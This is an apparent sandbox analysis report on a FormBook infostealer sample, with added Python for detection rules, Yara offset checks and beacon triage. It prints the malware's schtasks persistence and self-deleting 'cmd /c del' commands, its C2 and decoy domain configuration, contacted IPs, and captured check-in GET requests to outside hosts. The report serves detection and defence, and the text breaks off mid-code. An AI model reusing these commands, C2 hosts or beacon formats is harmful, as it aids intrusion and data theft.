
Windows Analysis Report ejecutable2.exe

Overview

General Information

Sample Name:ejecutable2.exe
Analysis ID:491547
MD5:2d359d2c999ccb15bc71229bb0275bb6
SHA1:5b5a384e8147fd996ca7c1c08f041f7b1fe7927a
SHA256:5345f3e44aadb2d07feb0520bce71dd59be35a53410fcfda5c5c1bec06b176bf
Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • ejecutable2.exe (PID: 2548 cmdline: 'C:\Users\user\Desktop\ejecutable2.exe' MD5: 2D359D2C999CCB15BC71229BB0275BB6)
    • schtasks.exe (PID: 2848 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • ejecutable2.exe (PID: 2528 cmdline: C:\Users\user\Desktop\ejecutable2.exe MD5: 2D359D2C999CCB15BC71229BB0275BB6)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • wscript.exe (PID: 2584 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 979D74799EA6C8B8167869A68DF5204A)
          • cmd.exe (PID: 2640 cmdline: /c del 'C:\Users\user\Desktop\ejecutable2.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
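The process tree above shows four behaviours that are cheap to detect from process-creation telemetry: schtasks.exe creating a task from an XML file in the user's Temp directory, the sample re-launching its own image, a script host (wscript.exe) started with no script to run, and cmd.exe deleting the original executable. The following Python is an added example written for this page, not Joe Sandbox code or a detection shipped with any product. The event records are constructed from the tree above (with the sandbox's single quotes restored to the double quotes Windows passes); the field names, rule names and the %Temp% path test are assumptions; the self-deletion rule walks the parent chain, which is why the `del` issued three processes below ejecutable2.exe is still attributed to it.

```python
"""Detection rules over process-creation events shaped like the report's process tree."""
import re

# Constructed events mirroring the process tree (sandbox single quotes restored to double quotes).
EVENTS = [
    {"pid": 2548, "ppid": 1000, "image": r"C:\Users\user\Desktop\ejecutable2.exe",
     "cmdline": r'"C:\Users\user\Desktop\ejecutable2.exe"'},
    {"pid": 2848, "ppid": 2548, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CmsVPZkxbOtm" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmp86AE.tmp"'},
    {"pid": 2528, "ppid": 2548, "image": r"C:\Users\user\Desktop\ejecutable2.exe",
     "cmdline": r"C:\Users\user\Desktop\ejecutable2.exe"},
    {"pid": 1764, "ppid": 2528, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 2584, "ppid": 1764, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r"C:\Windows\SysWOW64\wscript.exe"},
    {"pid": 2640, "ppid": 2584, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\ejecutable2.exe"'},
]

# Both quote styles are accepted because the sandbox prints command lines with single quotes.
XML_ARG = re.compile(r"""/xml\s+(?:"([^"]+)"|'([^']+)'|(\S+))""", re.I)
DEL_CMD = re.compile(r"""/c\s+del\s+(?:"([^"]+)"|'([^']+)'|(\S+))""", re.I)
TEMP_DIR = "\\appdata\\local\\temp\\"   # assumption: user Temp is the path to flag


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def first_group(match):
    return next(g for g in match.groups() if g is not None)


def ancestors(ev, by_pid):
    """Parent, grandparent, ... until the chain leaves the event set."""
    cur = by_pid.get(ev["ppid"])
    while cur is not None:
        yield cur
        cur = by_pid.get(cur["ppid"])


def rule_schtasks_xml_from_temp(ev, by_pid):
    """schtasks /Create importing a task definition from the user's Temp directory."""
    if basename(ev["image"]) != "schtasks.exe" or not re.search(r"/create\b", ev["cmdline"], re.I):
        return False
    m = XML_ARG.search(ev["cmdline"])
    return bool(m) and TEMP_DIR in first_group(m).lower()


def rule_self_spawn(ev, by_pid):
    """A process launching a second copy of its own image (the hollowed child in this tree)."""
    parent = by_pid.get(ev["ppid"])
    return parent is not None and parent["image"].lower() == ev["image"].lower()


def rule_script_host_without_script(ev, by_pid):
    """wscript/cscript started with nothing to run: no legitimate work, a ready injection target."""
    if basename(ev["image"]) not in ("wscript.exe", "cscript.exe"):
        return False
    return ev["cmdline"].strip().strip('"').lower() == ev["image"].lower()


def rule_self_delete(ev, by_pid):
    """cmd /c del whose target is the image of an ancestor process."""
    if basename(ev["image"]) != "cmd.exe":
        return False
    m = DEL_CMD.search(ev["cmdline"])
    if not m:
        return False
    target = first_group(m).lower()
    return any(a["image"].lower() == target for a in ancestors(ev, by_pid))


RULES = {
    "schtasks_xml_from_temp": rule_schtasks_xml_from_temp,
    "self_spawn": rule_self_spawn,
    "script_host_without_script": rule_script_host_without_script,
    "self_delete": rule_self_delete,
}


def evaluate(events):
    """Return (pid, rule_name) for every rule that fires on every event."""
    by_pid = {e["pid"]: e for e in events}
    return [(ev["pid"], name) for ev in events for name, rule in RULES.items() if rule(ev, by_pid)]


if __name__ == "__main__":
    for pid, name in evaluate(EVENTS):
        print(pid, name)
```

Run against this tree the rules fire once each, on PIDs 2848, 2528, 2584 and 2640; the first copy of the sample (PID 2548) does not trip `self_spawn` because its parent lies outside the event set, and a `schtasks /Create` whose XML lives outside Temp stays silent.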

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.wwiilive.com/u4an/"], "decoy": ["charlottesbestroofcompany.com", "gxzcgl.com", "easyprints.xyz", "hitmanautomation.com", "play-to-escape.com", "beansmagic.com", "lianxiwan.xyz", "nuhive.net", "whystake.com", "n6h65.online", "emergencyprep4cast.com", "peolinks.com", "8ls-world.com", "tezportal.net", "trych.net", "bathrobeconnection.com", "quinnwebster.top", "sagarmakhija.online", "ladiesgossiping.com", "400doultonct.com", "anitaeichler.net", "zaibuxi.info", "cateringfrenchcroissant.com", "iblispk.art", "area-arquitectos.com", "iptechcm.com", "earthnodeone.com", "yhomggsmtdynchb.store", "movingcompanybaltimoremd.com", "na6jzt.com", "solarpanelsforhome.net", "krnlfree.com", "institutosamar.com", "only-dieta.store", "shieldhero.online", "booklibrarypdfapp.icu", "solidhelp.net", "bearmarket.party", "billysboots.com", "pyuaetr.com", "pizza-mio.com", "merchantcentergroup.com", "branchwallet.com", "multicoininvestment.com", "gzruohong.com", "doomfishingtackle.com", "eryamanescortbayan.xyz", "tunetel.com", "rhccateringevents.com", "monamodda.com", "horsmon-merchandising.com", "sharkhostlive.com", "petersonmovingco.com", "forinfodunia.com", "theseattlenotary.com", "nyc-lavage.com", "tes5ci.com", "dunedinhyperlocal.com", "myntlaccount.online", "vehiclegraphicstoronto.com", "alexarts-tortenmanufaktur.info", "empresaimperfeitors.com", "oinfoproduto.com", "mdjrhyp.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(25 further memory-dump entries not shown on this page)

Unpacked PEs

Source | Rule | Description | Author
0.2.ejecutable2.exe.262ecec.3.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
4.2.ejecutable2.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
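To confirm a Yara hit like the ones listed above, an analyst re-checks the reported offsets in the dump and looks at what the matched bytes actually are. The following Python is an added example and not part of the report or of the rules it cites: it parses the offset/string lines exactly as printed for the first memory dump, builds a constructed dump (zero-filled, with those bytes at those offsets) so it runs offline, re-finds every distinct pattern independently of the reported offsets, and decodes the 5-byte JPCERT strings, which are `push imm32` instructions. The `$sequence_0` bytes decode to `add ecx, eax; rdtsc; sub eax, ecx; mov [ebp-4], eax`, a time-stamp-counter delta of the kind the "RDTSC time measurements" signature refers to. To use it on a real .sdmp file, replace `build_dump(...)` with the file's bytes.

```python
"""Re-check Yara hit offsets in a memory dump and decode the matched bytes."""
import re

# Offset/string lines as printed in the report for the first memory dump.
REPORTED = """
0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0x16ac9:$sqlite3step: 68 34 1C 7B E1
0x16bdc:$sqlite3step: 68 34 1C 7B E1
0x16af8:$sqlite3text: 68 38 2A 90 C5
0x16c1d:$sqlite3text: 68 38 2A 90 C5
0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
0x16c33:$sqlite3blob: 68 53 D8 7F 8C
"""

LINE = re.compile(r"^(0x[0-9a-fA-F]+):(\$\w+):\s*((?:[0-9A-Fa-f]{2}\s*)+)$")


def parse_reported(text):
    """[(offset, string name, pattern bytes)] in the order printed."""
    entries = []
    for line in text.strip().splitlines():
        m = LINE.match(line.strip())
        if not m:
            raise ValueError("unparseable line: " + line)
        entries.append((int(m.group(1), 16), m.group(2), bytes.fromhex(m.group(3))))
    return entries


def build_dump(entries, size=0x20000):
    """Constructed stand-in for the .sdmp file: zeros with the reported bytes at the reported offsets."""
    buf = bytearray(size)
    for off, _, pat in entries:
        buf[off:off + len(pat)] = pat
    return bytes(buf)


def verify(dump, entries):
    """(offset, name) pairs whose bytes are NOT at that offset; an empty list means the report checks out."""
    return [(off, name) for off, name, pat in entries if dump[off:off + len(pat)] != pat]


def scan(dump, entries):
    """Re-find every distinct pattern independently of the reported offsets: {name: [offsets]}."""
    hits = {}
    for _, name, pat in entries:
        if name in hits:
            continue
        offs, start = [], 0
        while (i := dump.find(pat, start)) != -1:
            offs.append(i)
            start = i + 1
        hits[name] = offs
    return hits


def push_imm32(pat):
    """Immediate of a 5-byte `push imm32` (opcode 0x68), or None for anything else.
    The three JPCERT strings are such pushes; 68 34 1C 7B E1 is push 0xE17B1C34."""
    if len(pat) == 5 and pat[0] == 0x68:
        return int.from_bytes(pat[1:], "little")
    return None


# $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) disassembles to
#   add ecx, eax ; rdtsc ; sub eax, ecx ; mov [ebp-4], eax
# i.e. a time-stamp-counter delta, the construct behind the report's RDTSC timing signature.

if __name__ == "__main__":
    entries = parse_reported(REPORTED)
    dump = build_dump(entries)   # for a real file: dump = open("dump.sdmp", "rb").read()
    print("mismatches:", verify(dump, entries))
    for name, offs in scan(dump, entries).items():
        print(f"{name:14}", [hex(o) for o in offs])
    for _, name, pat in entries:
        if (imm := push_imm32(pat)) is not None:
            print(f"{name}: push 0x{imm:08X}")
```

`verify` is the triage step (does the dump really contain these bytes where the report says), `scan` is the hunting step (where else do the same patterns occur), and `push_imm32` shows that the sqlite3 strings are 32-bit constants pushed as arguments rather than ASCII names, which is why they survive string obfuscation.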

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp; Malware Configuration Extractor: FormBook, configuration as listed under Malware Configuration above (C2 www.wwiilive.com/u4an/ plus the 64 decoy domains)
Multi AV Scanner detection for submitted file
Source: ejecutable2.exe; VirusTotal: Detection: 27%
Yara detected FormBook
Source: Yara match; File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: 4.2.ejecutable2.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: ejecutable2.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: ejecutable2.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb; source: ejecutable2.exe, 00000004.00000002.487685735.00000000009D0000.00000040.00000001.sdmp, wscript.exe
Source: Binary string: wscript.pdb; source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp
Source: Binary string: wscript.pdbN; source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.branchwallet.com
Source: C:\Windows\explorer.exe; Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe; Network Connect: 5.101.152.161 80
Source: C:\Windows\explorer.exe; Network Connect: 35.168.81.157 80
Source: C:\Windows\explorer.exe; Network Connect: 3.223.115.185 80
Source: C:\Windows\explorer.exe; Domain query: www.tunetel.com
Source: C:\Windows\explorer.exe; Domain query: www.play-to-escape.com
Source: C:\Windows\explorer.exe; Domain query: www.yhomggsmtdynchb.store
Source: C:\Windows\explorer.exe; Network Connect: 217.160.0.222 80
Source: C:\Windows\explorer.exe; Domain query: www.iptechcm.com
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Domain query: www.pizza-mio.com
Source: C:\Windows\explorer.exe; Network Connect: 195.77.116.8 80
Source: C:\Windows\explorer.exe; Network Connect: 81.169.145.77 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.wwiilive.com/u4an/
Source: Joe Sandbox View; ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View; ASN Name: BEGET-ASRU
Source: global traffic; HTTP traffic detected: GET /u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv HTTP/1.1; Host: www.tunetel.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (seven null bytes, no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv HTTP/1.1; Host: www.branchwallet.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (seven null bytes, no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv HTTP/1.1; Host: www.iptechcm.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (seven null bytes, no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv HTTP/1.1; Host: www.pizza-mio.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (seven null bytes, no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv HTTP/1.1; Host: www.wwiilive.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (seven null bytes, no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv HTTP/1.1; Host: www.play-to-escape.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (seven null bytes, no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv HTTP/1.1; Host: www.yhomggsmtdynchb.store; Connection: close; Data Raw: 00 00 00 00 00 00 00 (seven null bytes, no printable ASCII)
Source: Joe Sandbox View; IP Address: 3.223.115.185
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 27 Sep 2021 15:39:12 GMT; Content-Type: text/html; Content-Length: 808; Connection: close; Vary: Accept-Encoding; Last-Modified: Fri, 09 Oct 2020 08:38:37 GMT; ETag: "328-5b138dffc24c6"; Accept-Ranges: bytes; Data (decoded from the raw hex dump, a generic error page):
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <title>404 Not Found</title>
  <link rel="stylesheet" href="/error_docs/styles.css">
</head>
<body>
<div class="page">
  <div class="main">
    <h1>Server Error</h1>
    <div class="error-code">404</div>
    <h2>Page Not Found</h2>
    <p class="lead">This page either doesn't exist, or it moved somewhere else.</p>
    <hr/>
    <p>That's what you can do</p>
    <div class="help-actions">
      <a href="javascript:location.reload();">Reload Page</a>
      <a href="javascript:history.back();">Back to Previous Page</a>
      <a href="/">Home Page</a>
    </div>
  </div>
</div>
</body>
</html>
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.472044018.0000000003E50000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000005.00000000.473039091.0000000004513000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerT
Source: explorer.exe, 00000005.00000000.472858003.000000000447A000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: ejecutable2.exe, 00000004.00000000.422605822.0000000001122000.00000020.00020000.sdmp; String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown; DNS traffic detected: queries for: www.tunetel.com
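FormBook's configuration pairs one real C2 path with a list of decoy domains, and the HTTP lines in this section show the bot sending the same-shaped GET to six decoys as to www.wwiilive.com. The following Python is an added example, not code from the report or from any FormBook tool: it parses those seven requests (re-typed from the Networking section, with a small helper that reproduces the captured headers), labels each host as C2, decoy or unknown from the configuration, and flags requests that have the check-in shape seen here (GET to the configured path, two query parameters of which the first is a base64 blob, `Connection: close`, no User-Agent). The decoy list is trimmed to the domains in this run plus one more, the check-in shape is a heuristic inferred from these captures rather than a documented constant, and nothing is claimed about what the second parameter encodes.

```python
"""Triage FormBook check-in beacons against the sandbox-extracted configuration."""
import re

# Extracted configuration; decoy list trimmed for this example (constructed subset).
CONFIG = {
    "C2 list": ["www.wwiilive.com/u4an/"],
    "decoy": ["charlottesbestroofcompany.com", "play-to-escape.com", "iptechcm.com",
              "yhomggsmtdynchb.store", "pizza-mio.com", "branchwallet.com", "tunetel.com"],
}


def beacon(host, blob):
    """Re-create one captured request; the report shows no User-Agent header."""
    return (f"GET /u4an/?cRrtMz2={blob}&an=lnlpiVNpa2ntv HTTP/1.1\r\n"
            f"Host: {host}\r\nConnection: close\r\n\r\n")


# The seven GET requests from the Networking section, re-typed as raw HTTP.
OBSERVED = [
    beacon("www.tunetel.com", "FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw=="),
    beacon("www.branchwallet.com", "bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w=="),
    beacon("www.iptechcm.com", "Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q=="),
    beacon("www.pizza-mio.com", "Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA=="),
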